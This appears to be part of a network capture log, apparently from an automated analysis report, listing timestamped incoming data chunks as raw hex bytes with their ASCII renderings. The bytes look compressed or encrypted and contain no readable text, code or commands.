                                                                                                                                                            2022-09-29 12:45:24 UTC32791INData Raw: 9f 6d 89 d4 51 a7 38 fb 73 82 4d b5 9c 22 f9 46 db 6d 9d 2e c4 88 0c 11 46 e4 c5 cc b9 7c 1a 0a 78 02 f5 95 e1 bc 21 c8 06 3b 5b 4c b7 be 59 8f bb 9d 75 4c 94 2d 57 c1 e1 b1 f5 28 c3 89 73 d2 91 8f f3 20 aa b7 c3 6d 8e 19 99 ea 0d f2 76 d1 0d ce c2 db 18 c8 2c 38 c6 1f 2d d6 a7 5b 2c a9 77 64 d6 f9 af bf e3 b8 6f 99 87 1e 5d b9 8f 88 e9 c1 fe 9c b9 3f 73 00 9c ec e7 9f ca e9 86 25 e0 5c 17 fc ee 45 27 4b e5 f1 28 5b 3f 08 c4 5e 2e 36 bf 82 18 79 92 7f bf 23 05 35 b6 33 42 d1 c2 1a 89 a1 59 e1 50 ff e4 eb cb 62 56 e1 38 27 66 5d d0 ca a6 7b d2 91 e6 09 10 0f fe 79 d7 a9 1b 49 a4 ba 2f f9 a7 03 bb 00 d5 12 18 2b 45 32 b8 07 df d8 97 b5 94 1d ed c0 fb 73 1e cb 80 d0 d5 20 75 28 6e 98 16 3e 7f 4b 6e 6f ac f8 f0 4e 02 63 fd d4 20 01 bf 45 c9 07 59 f2 b2 fe 11
                                                                                                                                                            Data Ascii: mQ8sM"Fm.F|x!;[LYuL-W(s mv,8-[,wdo]?s%\E'K([?^.6y#53BYPbV8'f]{yI/+E2s u(n>KnoNc EY
                                                                                                                                                            2022-09-29 12:45:24 UTC32807INData Raw: b6 0a e6 6e 37 71 44 1b ea 58 18 b5 4f 58 df 64 64 04 7a 26 e1 73 5c f4 e2 8b 65 ea fe 3e e1 59 f9 15 8c 79 b2 40 2c 64 5b 3b a3 51 49 bf b2 1e 49 fa b5 4b 2b a7 bf 58 90 d3 9f 57 97 51 3a a3 f0 bb 98 c0 a9 d6 51 0e 3e 50 34 9b 80 53 29 85 89 92 fa 83 f1 40 f6 aa 9e be 20 14 bf ea 92 a1 af 4e d1 5c 2b c0 fc c3 a5 5a 21 f5 0a 71 29 41 f1 8d 8c 39 85 5e 4b b9 90 90 0d be a9 3c e9 09 5d 00 a0 fa 52 8f 2b ae 94 df 9c ba e7 cb d0 09 8c b4 77 db 0a c3 e4 8c c2 42 c7 ba 88 45 1b 69 cd 49 38 49 a0 6e 0e 9c d1 74 fe a5 09 d2 3b e7 79 ed 9f eb 2a 5d 62 cc bd a3 0a 5e 2a f7 f4 5a 30 c0 63 af f4 4d 32 d2 e6 ff 0e 93 87 34 02 4b 45 d7 d6 28 04 86 e7 56 27 b2 c6 7b 0a 91 b9 d3 e7 93 74 ff d1 e3 1e fe 3c 8b 81 17 ad 2d 64 1c ad 0e 10 67 14 5e 63 87 46 ad 39 98 2f 74 aa
                                                                                                                                                            Data Ascii: n7qDXOXddz&s\e>Yy@,d[;QIIK+XWQ:Q>P4S)@ N\+Z!q)A9^K<]R+wBEiI8Int;y*]b^*Z0cM24KE(V'{t<-dg^cF9/t
                                                                                                                                                            2022-09-29 12:45:24 UTC32823INData Raw: b2 68 69 86 88 c3 fa 89 de 84 e7 31 de 22 b2 1e e1 e8 0e d7 3e 08 ea 27 96 92 23 97 e7 f6 01 03 08 d4 f4 39 b8 c8 00 8f 33 af c2 5c 73 5f 51 7e 25 10 ad c0 21 ba 1d 76 a9 c6 dd fc 34 15 b3 ca 87 00 4a 09 cf 6b 00 be 6b 7c 43 4d 17 c6 9c e4 2d 7b 56 89 e0 3b 9d 1b 41 66 22 d4 a3 5b 82 c0 08 3f 10 21 21 85 12 31 ca a0 27 b9 59 b1 4a 0f 15 b2 48 70 eb 3e 3d a3 5b 12 af a8 3a 6b 18 1e 11 e0 e0 40 c9 e5 99 bb e1 1b ed 9a 89 79 b7 d0 96 c0 a1 fc 8b c0 cc dc 24 d7 3f d6 fa c2 61 80 5b 04 77 f5 37 ca b1 e9 32 06 ad 45 e5 65 c2 77 69 ca a4 38 59 27 f1 8c c9 57 92 31 cf 24 a9 6d d1 da 86 06 ce 0f 41 9f 98 eb 09 9c 83 e7 58 f7 b6 61 88 86 84 48 48 29 15 4f 8e f6 79 de 57 9e 52 7c f6 6b 7d fe de 3e 91 2f 00 2f 4b 57 1d 23 e9 c9 78 61 ae c0 15 09 b0 d6 bf dc 81 60 9c
                                                                                                                                                            Data Ascii: hi1">'#93\s_Q~%!v4Jkk|CM-{V;Af"[?!!1'YJHp>=[:k@y$?a[w72Eewi8Y'W1$mAXaHH)OyWR|k}>//KW#xa`
                                                                                                                                                            2022-09-29 12:45:24 UTC32839INData Raw: 97 11 68 2c 15 af 13 fa 8d ea 42 55 09 1f e4 c5 2c 10 85 33 d8 55 7d c6 1b 47 80 77 9c 27 84 d7 c6 d9 3c b8 c0 af 67 f7 61 44 e5 dc 81 60 35 59 82 48 cc 7a 49 e1 98 45 32 a5 c3 2b 30 1a 8c 02 f6 b0 20 a5 46 0a fa d7 23 7c 97 c0 a1 5a 6c 47 39 5d ad 22 54 79 ea d7 d3 8a 0a 1a 41 b6 17 9a bc bb 0f 65 a2 46 f1 70 61 b5 86 62 46 52 c9 73 4b 77 33 8d 83 61 d1 bd cf 49 39 38 32 6f aa 73 88 5e 60 1f f5 72 33 af fc 3f b7 dc df c9 e1 33 bc 6c b6 04 73 e5 88 0f b6 36 af 5d 78 2e 56 7d 7c c9 bb 90 b1 a3 ad fb 53 cf 76 a8 c6 13 d3 f5 b1 5c 9d cb 8a 49 7b f3 91 43 cb c5 40 48 40 82 59 fc 4a 3d 47 39 cd f2 97 d4 49 47 64 82 f7 19 a4 9b ad 93 6c c5 f8 39 01 93 98 97 7c c5 b2 69 fa 92 70 4d bb 64 9e a1 fa 52 bb 6b 4b a7 f1 d8 1d 2c 21 38 33 8a b1 38 79 70 d3 9e 10 06 8b
                                                                                                                                                            Data Ascii: h,BU,3U}Gw'<gaD`5YHzIE2+0 F#|ZlG9]"TyAeFpabFRsKw3aI982os^`r3?3ls6]x.V}|Sv\I{C@H@YJ=G9IGdl9|ipMdRkK,!838yp
                                                                                                                                                            2022-09-29 12:45:24 UTC32855INData Raw: e4 67 58 ad 15 75 f5 6f fe 3b 02 22 e9 a3 d4 cd a9 fc a6 3e 28 af 10 7c c1 71 be aa 01 ed 78 ec 44 2d 6e b2 cf 66 97 65 4b 29 5b 3b cd 73 c9 89 4d e3 6f b9 79 96 2b a1 76 70 82 66 ab 78 25 32 d8 75 31 67 bf f9 be 92 4e 16 8a 5d a7 d3 76 38 e3 95 52 26 35 ca d5 6f 9b a6 04 2d 5c 07 64 63 90 86 91 4f 60 e3 0c 02 ef 93 22 e7 a8 e6 14 33 49 78 3c 5e b5 0f ca 99 05 67 f9 62 38 e9 57 a0 71 d5 d4 b0 e4 2f b1 db a8 70 e2 58 eb ee ad 43 d4 0b c4 b3 36 0a 06 69 05 e2 06 2a e8 e7 af 44 61 4e c5 19 c5 ae c1 92 b4 21 07 bf 02 0c 16 82 ab f7 8e 1e 57 72 94 e5 c8 8d e2 be 87 0f 94 23 de 95 c1 42 a6 0f 86 54 0c fb 3f ee 72 69 a1 8d 24 38 18 3e a2 66 5f f6 9e 2a 48 eb 40 f0 50 a7 0c 6c 18 bd 61 5b 79 78 30 94 14 6d 3c f1 5a 87 d3 f4 d9 85 38 0b 60 ed 66 4c a6 f4 a3 41 97
                                                                                                                                                            Data Ascii: gXuo;">(|qxD-nfeK)[;sMoy+vpfx%2u1gN]v8R&5o-\dcO`"3Ix<^gb8Wq/pXC6i*DaN!Wr#BT?ri$8>f_*H@Pla[yx0m<Z8`fLA
                                                                                                                                                            2022-09-29 12:45:24 UTC32871INData Raw: fd c6 95 f9 77 5d 98 be 17 55 c2 2f 99 26 0f 22 c6 2f 64 09 0b 11 d2 f4 cb 29 ae 48 3b cb 59 ef 0f 2f 3d 05 a0 62 cf f3 20 e5 c3 c6 c1 cc 02 fc ed 75 b1 34 0a 68 ab ac b2 a7 15 f0 b1 77 f4 bd e2 c2 34 f8 b1 73 d8 5b 08 d4 fe 09 59 ac 47 ff f4 c7 ed a3 cb d5 2d 9a ed d5 ad e8 37 6b a6 47 36 c7 c9 84 b5 cf 25 8c ce 04 0c 89 73 3b e9 c0 5f cf cc 2d bc 66 56 93 7d 1c c7 7f 4b d3 67 49 ca 7d 9a 18 d0 38 0c da 32 e6 16 d8 c7 dc a9 d8 72 e5 0c fe a2 5c 6d 9e 65 39 76 4a fc 99 d4 b3 0a 03 9a c0 ad 1b 7d dc e2 93 6e 09 cf 9b 42 9e 8a 5f a7 d1 95 a7 fd 43 d8 d2 69 ca 1e 31 de 1b 2e 22 b9 17 1c 9b 84 a4 a4 23 cb f5 5e ff 6c 1d c8 39 bd 52 87 8d 1d e6 02 d8 94 7f 62 83 be eb b3 37 ca 9e f8 34 f3 34 f2 e2 38 0b aa 8e 24 40 64 72 6c 1c 96 79 39 5f 71 34 35 fe 7f 67 75
                                                                                                                                                            Data Ascii: w]U/&"/d)H;Y/=b u4hw4s[YG-7kG6%s;_-fV}KgI}82r\me9vJ}nB_Ci1."#^l9Rb7448$@drly9_q45gu
                                                                                                                                                            2022-09-29 12:45:24 UTC32887INData Raw: 67 3f cd 0f fe ac 5b 30 de ec 37 f6 a9 4b 12 5b 45 41 af 90 2b 92 50 5d 3a d3 b3 7d 14 aa 25 c7 ef ee 85 76 cb 51 e0 52 d5 13 14 82 f9 f5 ed ae ef d3 b2 90 63 01 5e c1 cc 2c f6 74 b4 6f 8a 40 25 19 8b 73 aa 2b d2 bd 29 71 79 24 2e a4 16 ce 39 ec e1 9e 48 64 83 12 38 76 d2 92 7f ad 86 88 2b d4 4c f8 b7 ce 77 2e 5c 59 59 3e b0 3c d3 8c 0f 99 58 e6 37 4a 26 76 8b 1c 8a 93 8f 5d c8 54 b3 93 de 05 1a 14 af 63 83 55 67 0e 7c ae 10 27 c5 0d 9b 0f a5 2a 0e c0 08 a9 b9 02 a0 64 c2 08 1d ac 55 ec 40 2a 40 2f 26 a5 45 8f 23 07 e3 77 ec 07 14 2b 08 1b e5 46 11 4f aa ef 1c f8 4c a9 8e d3 8a b7 11 07 1e 9c 28 09 c0 4e 01 3e 4e 19 39 dc f1 d5 42 e9 6c f8 6f a8 26 24 35 4b eb 74 93 9c be 57 7a c9 9a cf cd 4a db bc 86 15 1b ce 61 63 40 32 03 a9 4b 1c c9 9b 75 0e c9 85 ca
                                                                                                                                                            Data Ascii: g?[07K[EA+P]:}%vQRc^,to@%s+)qy$.9Hd8v+Lw.\YY><X7J&v]TcUg|'*dU@*@/&E#w+FOL(N>N9Blo&$5KtWzJac@2Ku
                                                                                                                                                            2022-09-29 12:45:24 UTC32903INData Raw: 96 8b 89 da 35 a0 b1 68 6e fb 6b 31 df 43 86 7e b7 36 ec ec 88 2b 4a 25 71 87 fa 01 16 41 fb 1f 29 3a 7f c8 ed 78 2e 88 96 e5 2c 50 79 71 cd 5a 07 ce 55 08 78 44 f8 b7 6e f5 bf e2 4e 21 5e 12 11 56 33 39 4f d3 ea 1a 37 1c 08 75 13 dc 7d 60 03 25 e2 7c 07 29 8b 6a 1c 62 43 bc 0a 45 4d 2e 1a 5b 32 4a cf 16 a2 48 a0 e6 8a 5c 2b 90 68 56 55 dc 82 4a 30 ed 97 94 4b 3c 82 48 58 0f 8c 6f 4e 40 9b 50 a0 50 32 ec 41 a7 25 6c e4 30 e6 a3 21 20 90 61 0f 8b 3c 31 e6 7c 89 ea 81 e2 b2 91 1e fa 21 03 27 e6 40 57 88 5f 02 e4 44 74 8f 29 17 f1 ce ca 6f 13 96 a6 78 12 79 55 c0 3c ab d7 c6 c0 f8 5c a4 c8 fc 8c 34 4c c7 d8 b0 23 42 a9 6a 9e 6c 34 73 6d 19 11 f7 92 76 e2 d0 a9 b5 ea fd 16 00 e4 fb 05 a2 2b 11 7f 63 e5 8d db c6 b7 fa 49 ba 32 89 a9 c9 db 2b cd b4 72 36 19 3f
                                                                                                                                                            Data Ascii: 5hnk1C~6+J%qA):x.,PyqZUxDnN!^V39O7u}`%|)jbCEM.[2JH\+hVUJ0K<HXoN@PP2A%l0! a<1|!'@W_Dt)oxyU<\4L#Bjl4smv+cI2+r6?
                                                                                                                                                            2022-09-29 12:45:24 UTC32919INData Raw: 06 67 c5 8a b8 33 7d a1 cc 38 a7 f9 04 84 50 71 a7 d3 93 dc 56 56 20 fb 1f b6 ef 23 9d ce 79 5a af 69 79 bf e0 96 5b 57 45 7f da 00 97 94 46 c7 3b 2a 25 8e ef 1c 25 0b f5 ca 82 13 b2 74 29 d1 f7 86 be e9 c0 85 41 aa 1a 93 de d3 4c c4 36 2a 1d 2c f8 f8 e4 f0 fe 79 a1 35 d7 f3 9e b1 51 6f 62 49 e9 fc 72 24 a0 8a 83 30 fa 3e 17 b2 e9 18 63 3d dc 63 42 3b fa a1 c6 ce 55 cb b9 71 d1 0f 1a 9d c6 fb b4 41 9d 79 c8 69 2e 13 04 96 ee d6 89 45 24 8f 94 b6 6d 5e b3 33 1d b4 d1 3b 42 50 c7 70 63 93 2d b6 c2 c9 8d 00 05 fa b1 7f 7e 28 97 55 63 48 34 a5 39 e6 4f 92 76 ee 65 0c 85 a9 a9 8c f7 aa 87 fd 90 ba fc 2f 0c cb 29 f0 e3 49 fd ba eb df b4 c6 ac 99 e8 3e d6 94 2d 8c f3 0d a8 6a 4d 1c 8a eb f0 32 0f 06 57 2a 2a 72 fe e2 c4 81 49 d2 61 eb ee f5 be 35 c4 a3 8e e9 75
                                                                                                                                                            Data Ascii: g3}8PqVV #yZiy[WEF;*%%t)AL6*,y5QobIr$0>c=cB;UqAyi.E$m^3;BPpc-~(UcH49Ove/)I>-jM2W**rIa5u
                                                                                                                                                            2022-09-29 12:45:24 UTC32935INData Raw: e0 c4 f0 c3 37 c7 3d 68 be 51 36 1e bd dd 3a aa 8d 29 44 6b a7 fb d6 be 76 1e 3e 8f 61 2d be 49 65 e2 fa c6 d1 15 28 bd 9d 8e 50 fd 61 95 e6 f2 9a ab 64 5a 29 3a 87 01 2f 9a 7b 72 ee ab 02 fb bf 6c 87 78 3e db 13 bb 04 81 35 06 b7 fb ea 54 27 38 41 ad 6f 59 5f 14 60 93 a7 11 63 cc d4 38 ba 67 da f7 e7 82 5a 3f fe b9 0e f9 2f e5 a5 04 19 f5 66 ca ef 20 35 31 b8 05 cb d1 20 de a5 2f 5d ce 15 9c 25 9d 7d 37 dc ea 8f 68 44 09 88 e4 74 4c 96 a8 ca 49 72 66 0b 62 3c 9d cb d4 4d d6 f5 6c 79 89 00 8c 51 f3 d5 6c 0f 11 17 10 7e d9 cd 12 a5 66 8f ad ab 68 49 8f 1d 01 fd a4 85 5f 14 03 7d ef f8 27 0c 89 fa cf 99 72 6e 86 93 e0 48 08 f7 c0 b5 da 85 62 be 1d c5 80 1d 56 a1 30 e3 d4 01 2b 46 1a 47 0e 1d ec 82 14 5c 96 31 80 82 b2 3c 21 22 30 b9 6d 90 68 6b 3c 47 19 0e
                                                                                                                                                            Data Ascii: 7=hQ6:)Dkv>a-Ie(PadZ):/{rlx>5T'8AoY_`c8gZ?/f 51 /]%}7hDtLIrfb<MlyQl~fhI_}'rnHbV0+FG\1<!"0mhk<G
                                                                                                                                                            2022-09-29 12:45:24 UTC32951INData Raw: 60 5f 9a 7e bb 8f 5a b0 ef 8c 29 28 ec 93 2c bb 22 39 cd dc 7a 7a ff a4 d8 f7 39 8f 89 e2 ed 39 5f 06 38 e3 b0 01 36 de e9 97 44 2c 08 20 f0 5d 15 24 4e dc 97 fb 9e a8 e9 53 92 29 1d fe 4a 06 74 be de 3c 03 6f 08 4a 05 a1 1c 59 d8 65 6b a0 52 f5 39 89 65 d7 a8 21 88 c1 fe 9f 7b 9a 87 54 68 75 8b 88 12 90 86 ac 4b a4 4d 02 29 1f 7a 0d 51 d1 0a 78 d3 6d 0e 61 4b 9f 3b 4a 2e 2f 07 9b 21 06 45 6f 69 1c 7f 10 4c c8 5f 28 d1 55 d6 c1 55 eb ad 76 ef 6f 69 e7 d0 9f 8a e6 6d 23 4f 51 57 4b 6b 08 ac 44 85 4e 5b 13 5f e1 96 00 45 0e ee 30 4b 1e 51 8c 58 ff b6 f0 a5 0b db f6 f8 1b 56 b7 92 63 52 a9 24 f1 9b 5e 08 2e 98 bf 6e 70 e9 db ea 48 83 14 a0 f0 b5 7f 91 e0 1c ed 5a 48 1e 4f 39 0b de 9d 74 67 12 c3 a2 ca 36 6e eb 32 f1 89 fb 42 6b df b7 6b 84 64 9f b1 42 44 68
                                                                                                                                                            Data Ascii: `_~Z)(,"9zz99_86D, ]$NS)Jt<oJYekR9e!{ThuKM)zQxmaK;J./!EoiL_(UUvoim#OQWKkDN[_E0KQXVcR$^.npHZHO9tg6n2BkkdBDh
                                                                                                                                                            2022-09-29 12:45:24 UTC32967INData Raw: 6c c4 d0 cf cb f2 d4 ae 7e 06 e9 72 57 6c bc a3 8d 09 7f 02 60 37 d6 54 65 28 0c e2 15 1d f9 03 6e 15 82 2e a4 a3 59 98 02 c0 ce dd a7 bc ea 42 fe 41 7b 71 c7 46 ff 75 84 8c 7b 12 23 5c 98 75 20 ec ec 42 4e fb e5 6e 1c b2 75 1b 85 50 d8 71 17 db 4f 0a bb 08 5c a1 f0 01 63 07 2f 8b 3d 69 fc 28 1e 7a 8b 98 50 05 70 ed 66 2d 87 0b e9 b4 00 cc 84 13 87 81 c6 02 00 d9 c6 36 b6 e6 38 dd 88 2e 5d a4 a6 76 ce 61 39 8b 33 1f e5 6b a3 3a 6f f0 58 cb c9 23 f2 80 ee b3 cd 0f 4b 61 e5 38 f7 7c 01 67 55 4f ea 35 68 6a f3 5f bc cb 1b 4c bd 83 18 2a 17 c7 13 d8 25 1f f0 bb c1 9e 4e e4 3d 21 28 95 27 50 a6 05 b0 fb 0e 99 52 da e5 b9 81 4a 4d 48 36 e0 d8 49 c0 49 f2 37 9f f4 ee 3e b8 7c 26 25 f1 b1 89 fc d0 f7 40 8d e4 18 a4 4f f2 67 8d f9 b2 5a e7 53 3b ac b4 3c cc 9f fe
                                                                                                                                                            Data Ascii: l~rWl`7Te(n.YBA{qFu{#\u BNnuPqO\c/=i(zPpf-68.]va93k:oX#Ka8|gUO5hj_L*%N=!('PRJMH6II7>|&%@OgZS;<
                                                                                                                                                            2022-09-29 12:45:24 UTC32983INData Raw: a3 2f af a9 12 df 46 09 2e 54 e1 fe e2 39 e6 31 be dd 88 c9 dc f6 16 7a 15 96 7c 9f 53 ef 31 c7 16 8d 3d f8 35 8f 6f d2 b8 e3 f7 4c 18 92 2f cd 92 6a ca c3 d9 65 08 05 e7 50 04 c3 83 55 6f 2d 26 32 35 e1 a8 4d 15 c1 40 5a 81 e0 a5 be bd 12 1a 5e 24 0c 40 59 aa 5f dc 25 57 03 4b 60 8f f2 f5 9a cc 1a e0 fc fe 4f 71 62 59 c1 b1 4d f0 5d 19 58 e9 8e 16 34 a0 91 93 40 51 c7 53 c6 d6 7d dc 9a e2 e0 f7 26 3e ee 5c 75 89 1d 8c 84 94 8f 20 13 e4 8e 7b 17 a0 f3 1f cf 16 7f dd f0 20 5d 8e 7a 69 aa 2e 82 fc e8 c7 cd 68 3a 31 c1 34 73 96 04 40 f1 98 1f e5 2c d8 0d 0c 7a 9e a7 4b 73 ae 5f c2 aa 50 98 12 ef 8c 51 05 cc 2a d7 09 46 fe 9e be 58 25 4d 67 06 bf 7f 35 cf 12 ee b3 02 2d 29 95 a9 81 9e 6e ec 8b f8 68 93 73 f9 81 cb b9 73 7f 1f c6 1f 87 3f b5 31 7f ca 1f 7d eb
                                                                                                                                                            Data Ascii: /F.T91z|S1=5oL/jePUo-&25M@Z^$@Y_%WK`OqbYM]X4@QS}&>\u { ]zi.h:14s@,zKs_PQ*FX%Mg5-)nhss?1}
                                                                                                                                                            2022-09-29 12:45:24 UTC32999INData Raw: 12 bc b0 55 b0 9b e4 01 43 eb 60 33 20 66 f2 af 49 57 75 f2 df 60 92 82 da 9d c3 59 88 21 15 be 8a 91 47 8d 71 ad c7 19 8b 3d d5 8b af 68 e9 a3 fe b7 8c 4a 03 1f 1f 9c b6 34 69 a6 6d fb 87 c3 63 e0 ec 01 cf 0d 7e 5b bf ec 61 8c 8d 7d 34 61 49 a7 67 1e 15 55 d9 ed ba f3 cb 4e 7d 53 6c 6b aa ce b0 d7 fd da a3 8b 90 03 1d b4 47 8c 44 8c 96 57 c1 b7 f8 de 39 f2 cf 9b 1c ea 51 ff d1 bf 20 9e 6a 81 6e 62 9b 12 55 b5 d0 a2 17 bf d0 17 8d 59 48 a2 d6 09 84 49 39 6b 5e f0 71 84 e1 d4 f7 ba d5 fe c2 a9 03 08 65 96 fd 57 0f 52 45 84 8b cb 7f 2b 47 7f f2 41 40 ff e7 9a 23 53 85 4f 02 d8 ff ec 9c bb 14 b3 c8 f5 27 a6 d5 47 0d f4 78 9a 24 73 5f 43 52 ac 71 fe 3e 53 3b f2 7d 0d e0 46 15 c9 20 f7 00 51 41 b4 0b 83 ce 70 9b 16 e2 03 1b 10 e2 f9 c1 f8 4d 85 d9 7b 5c 62 5e
                                                                                                                                                            Data Ascii: UC`3 fIWu`Y!Gq=hJ4imc~[a}4aIgUN}SlkGDW9Q jnbUYHI9k^qeWRE+GA@#SO'Gx$s_CRq>S;}F QApM{\b^
                                                                                                                                                            2022-09-29 12:45:24 UTC33015INData Raw: 7c 34 fa 96 18 b1 1f ac 8f 70 d6 3b c7 ca 5f 63 dd fd df b9 2b 43 f4 59 57 62 74 49 78 d0 35 22 94 86 65 ba 23 c7 2c d3 87 b8 c7 38 22 e2 c0 64 6f 99 0f 51 fc 13 6c b3 fd d5 6b b8 3f e3 25 49 67 bb 56 5b ee ff c4 e9 fa 06 88 e7 04 f3 f8 4f 52 8a 4e 3f 47 5d 5a 5a 8c c9 b3 9b 96 40 38 ea 87 8d 58 5d f8 29 1d 4d 45 3e 52 2b 08 9b 0b 58 e3 76 1a f6 cd 21 f9 c7 85 11 b2 5e 15 a3 ba 13 06 28 7f b0 7e a0 0f e3 15 2c e2 c7 8c 71 28 3c 87 d9 72 16 57 95 d0 0a 13 70 09 3f 00 50 12 51 dd c6 7b 1b d4 3a 2f 5d e1 f8 40 f7 5e ae db 4d b7 d3 e9 d0 78 96 ab e0 bb 64 f5 42 55 10 60 0d 78 1e 45 e9 ab b3 47 70 c3 ff 71 2b 0e b9 3b b3 a1 de b5 da b7 14 0c aa 48 30 75 62 ff 60 6f 69 69 91 70 9f 31 9f b6 d6 18 68 c8 f9 2e c2 e3 1f 28 3b 87 ed 36 ce bc b2 d0 e8 41 57 9f 6c 16
                                                                                                                                                            Data Ascii: |4p;_c+CYWbtIx5"e#,8"doQlk?%IgV[ORN?G]ZZ@8X])ME>R+Xv!^(~,q(<rWp?PQ{:/]@^MxdBU`xEGpq+;H0ub`oiip1h.(;6AWl
                                                                                                                                                            2022-09-29 12:45:24 UTC33031INData Raw: 8b 3c f7 73 2c bf b2 84 4e d6 c9 4b c2 8c 18 c6 c9 48 7e 4e 47 af 8c f2 0b 04 3c 0b a0 23 a4 a7 d2 f4 9f 14 4a a7 72 04 24 8f 91 12 88 ae a8 ab 60 4e e0 05 b3 c7 e1 b8 48 fd 47 68 13 33 ab 6e 96 56 cc e7 3d 76 52 b0 48 da 90 cb 19 ec 97 17 60 42 be 82 17 6d 46 0c 5f 7c 5a 76 43 56 eb 78 51 6e c5 1e d0 60 22 a8 08 f7 f0 38 35 b2 61 2f 28 1b 60 ac e8 28 0d 24 92 1f f0 cf 70 98 17 19 0b 12 89 62 3d 54 78 3c 91 db 17 86 cc 8e be fd 6b 89 7f 94 a7 33 d4 e4 69 69 55 33 e4 97 db 43 e2 80 4a 61 3d 0c 06 af 7b 24 e5 66 de 1b 63 93 39 11 b4 53 9e 55 41 d2 6c 84 0d bb f4 d3 9c 80 d4 26 7a 73 52 de 42 f8 32 e9 f1 77 9e f6 25 98 53 30 63 8b d2 02 fc 19 40 9c 80 9f 00 27 ee 86 cb 5d 37 2c d5 87 11 c7 73 1b a0 ba 7f a1 24 db 7a 97 1b a2 17 a0 b2 f0 3d 74 d7 ae e3 33 26
                                                                                                                                                            Data Ascii: <s,NKH~NG<#Jr$`NHGh3nV=vRH`BmF_|ZvCVxQn`"85a/(`($pb=Tx<k3iiU3CJa={$fc9SUAl&zsRB2w%S0c@']7,s$z=t3&
                                                                                                                                                            2022-09-29 12:45:24 UTC33047INData Raw: 64 49 0e b1 c6 0b 44 c6 f8 98 bc bd 70 82 61 ae 4c 8c 2c 96 e0 f4 ce 77 6f e2 cc 53 95 99 5a f9 91 9e 17 93 92 fa a6 a0 8c 22 7c 7d 5b a3 46 34 dc c4 10 d8 45 da 18 ae 76 ee d1 9f 22 56 6e 3e 46 c7 b6 a7 ec 14 a9 62 6e 2e 52 cb 8f e6 80 42 3c 6c 3d 81 5c 0f ea e0 45 13 9c 03 d2 47 a6 64 82 ea 6e f9 50 ad 54 f1 89 a8 36 36 8e eb 80 4a 9a 98 2c bf f3 c4 da fe d3 c4 0b fd f4 1e fc c4 f5 f3 95 83 b7 53 6d 89 9b eb 67 3c 3f 90 4b 67 6e 67 c1 52 d1 8f 90 cc 96 de 78 35 ca 7d 43 d2 7d c8 d6 be 07 e0 19 d8 e0 05 67 05 fa d0 18 df e9 96 7a 0f a6 2f 36 99 3d a2 eb 16 bf 52 79 39 e7 db e9 3f 78 be f2 27 77 0a 90 00 33 52 16 51 a0 fc 46 35 bb c3 d1 80 cb 81 06 18 a7 0d fa fd 11 b1 33 86 7a e2 1e 77 5d 84 16 2b 36 49 4d 1b 4d 4e 3a 3b e6 5f f7 72 4e f6 8b 00 59 b0 b7
                                                                                                                                                            Data Ascii: dIDpaL,woSZ"|}[F4Ev"Vn>Fbn.RB<l=\EGdnPT66J,Smg<?KgngRx5}C}gz/6=Ry9?x'w3RQF53zw]+6IMMN:;_rNY
                                                                                                                                                            2022-09-29 12:45:24 UTC33063INData Raw: 9c 55 3b f3 4a db b7 ae f5 b7 e4 67 5e 26 10 82 93 ed 0b b8 80 a6 89 56 37 76 83 e9 c4 32 dc 08 7a 26 73 bd de 1b f7 30 6c a3 89 ed 3f e4 49 c3 50 0c 8f 17 63 9c 25 5b 64 1e f6 fb 73 60 04 30 7b 18 e0 73 90 4c 9b de ff 41 40 0e f0 5a 81 09 c2 31 d1 44 bf b6 f1 a0 a2 b6 c2 f1 72 0c c9 a6 ae 0d dd 75 68 9b 19 a5 9c 71 54 c0 63 d9 72 b3 2f 85 d3 92 bc 46 d6 51 02 71 73 8e 4f 5c d1 c8 3e a3 1b 3e 4c df 0d 59 37 8c 59 34 03 72 f1 f9 6f 71 d2 23 bb 29 69 f5 9c d6 66 98 79 5b fb bb 38 80 14 30 f0 82 fa 2a 7f 90 a1 c5 12 8d 0d 7c 1d b8 37 05 8d 93 53 93 51 6c 2d 02 88 e0 11 4e 6f 9c ac 57 ea 2a b3 9e 96 79 d9 6a c3 2f cc 47 e3 02 8a dd 61 70 b4 4a 54 75 bc 3e 33 9a f9 ad b6 4b 92 1a e6 e7 df 4f 0b 42 2b b5 91 d4 9b c5 c5 0a 35 3d 75 8a 6e 7c 48 ca 6c 7e 79 5b 46
                                                                                                                                                            Data Ascii: U;Jg^&V7v2z&s0l?IPc%[ds`0{sLA@Z1DruhqTcr/FQqsO\>>LY7Y4roq#)ify[80*|7SQl-NoW*yj/GapJTu>3KOB+5=un|Hl~y[F
                                                                                                                                                            2022-09-29 12:45:24 UTC33079INData Raw: dc d2 d3 42 ca 47 a1 db 24 7c 91 e7 1a c8 17 58 b3 77 86 51 6a 1e e5 2f d8 b0 7a b9 91 e1 2b ba 78 42 8d 01 ab e5 e2 d2 01 6a 2e 76 bc 67 db 4f 74 f1 9a 16 48 fa b9 9c 83 7c 2c 27 83 e0 b7 6b fb d6 2c e3 65 87 56 e2 29 ee 83 02 69 f2 f0 8b 7a 27 f7 df 2b 1b 90 b9 a3 17 6e 23 4e 38 17 1b 02 ca 37 c2 c4 ec 46 1e 54 64 11 54 62 28 ba 7d 35 2d 8a 92 58 f4 30 6b 28 74 af 5b 2d 4b 05 0e 1d d0 94 82 d9 42 69 14 38 8d 0c 73 f8 1f b2 2a ee ae a2 ba f7 a8 0d a2 63 be b1 17 25 5d f7 74 a1 71 f9 f2 a1 89 56 1b 0a 60 85 5e e3 84 76 3f 7b d7 a7 b1 f1 ce b1 f3 f9 27 96 92 20 c1 a1 69 4b cd e4 c8 c8 65 da 6a 37 4c ad 40 9e 91 2d 3a b1 0d 5e 33 d1 c7 d7 f7 ab 8b 62 da 45 a8 54 7e cd 2f 06 12 8e e6 5f 10 16 69 40 f8 94 85 49 3f 91 1a ee 20 99 48 a1 29 2f 26 a5 b9 23 1d 4c
                                                                                                                                                            Data Ascii: BG$|XwQj/z+xBj.vgOtH|,'k,eV)iz'+n#N87FTdTb(}5-X0k(t[-KBi8s*c%]tqV`^v?{' iKej7L@-:^3bET~/_i@I? H)/&#L
